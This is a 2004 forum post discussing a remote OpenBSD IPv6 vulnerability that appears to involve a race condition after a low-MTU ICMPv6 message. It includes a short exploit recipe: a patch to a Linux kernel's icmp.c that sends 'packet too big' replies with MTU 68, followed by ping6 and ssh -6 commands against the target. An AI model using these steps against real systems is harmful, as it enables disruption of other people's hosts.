No announcement yet.

Remote OpenBSD vulnerability

  • Filter
  • Time
  • Show
Clear All
new posts

  • Remote OpenBSD vulnerability

    Don't see these very often (although it's certainly happened more than once, contrary to their claims) and only applies to OpenBSD systems on IPv6 networks, but still, interesting.

    I'm not 100% clear on the details, but it appears to be some sort of race condition involving receiving a low-MTU ICMP datagram then initiating a TCP/IPv6 connection.

    To exploit this vulnerability, you will need a Linux system. Edit Linux 2.4.24's net/ipv6/icmp.c and change the following:

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    Recompile. Reboot.

    ping6 openbsd
    ssh -6 openbsd

    The vulnerability discoverer's writeup is a little bit less than scholarly:
    Last edited by bascule; February 5, 2004, 16:13.
    45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B0
    45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B1
    [ redacted ]